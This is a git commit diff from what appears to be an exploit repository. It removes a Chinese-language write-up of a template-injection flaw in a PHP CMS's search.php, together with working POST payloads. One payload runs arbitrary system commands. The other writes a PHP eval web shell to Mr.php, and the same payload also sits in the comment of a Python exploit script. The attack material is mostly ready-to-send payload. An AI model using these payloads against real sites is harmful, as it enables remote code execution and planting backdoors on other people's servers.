Little Change

This commit is contained in:
Mr5m1th 2017-10-12 12:39:01 +08:00
parent 4a89ff0dce
commit 09b5ac323c
2 changed files with 1 additions and 7 deletions

View File

@ -1,8 +1,2 @@
漏洞详情:
漏洞位于search.php处echoSearchPage()函数对html中的searchpage标签进行了多次的替换多次替换过程中不断组合形成payload
PostData:
searchtype=5&searchword={if{searchpage:year}&year=:e{searchpage:area}}&area=v{searchpage:letter}&letter=al{searchpage:lang}&yuyan=(join{searchpage:jq}&jq=($_P{searchpage:ver}&ver=OST[9]))&9[]=sys&9[]=tem('cmd');
可执行任意命令
PostData:
searchtype=5&searchword={if{searchpage:year}&year=:e{searchpage:area}}&area=v{searchpage:letter}&letter=al{searchpage:lang}&yuyan=(join{searchpage:jq}&jq=($_P{searchpage:ver}&ver=OST[9]))&9[]=fwrite(&9[]=fopen('Mr.php','w')&9[]=,'<?php eval($_POST["Mr"]);?>');
可GetShell

View File

@ -2,7 +2,7 @@
#author : Mr5m1th
#PostData = searchtype=5&searchword={if{searchpage:year}&year=:e{searchpage:area}}&area=v{searchpage:letter}&letter=al{searchpage:lang}&yuyan=(join{searchpage:jq}&jq=($_P{searchpage:ver}&ver=OST[9]))&9[]=fwrite(&9[]=fopen('Mr.php','w')&9[]=,'<?php eval($_POST["Mr"]);?>');
import hackhttp
import sys
import requests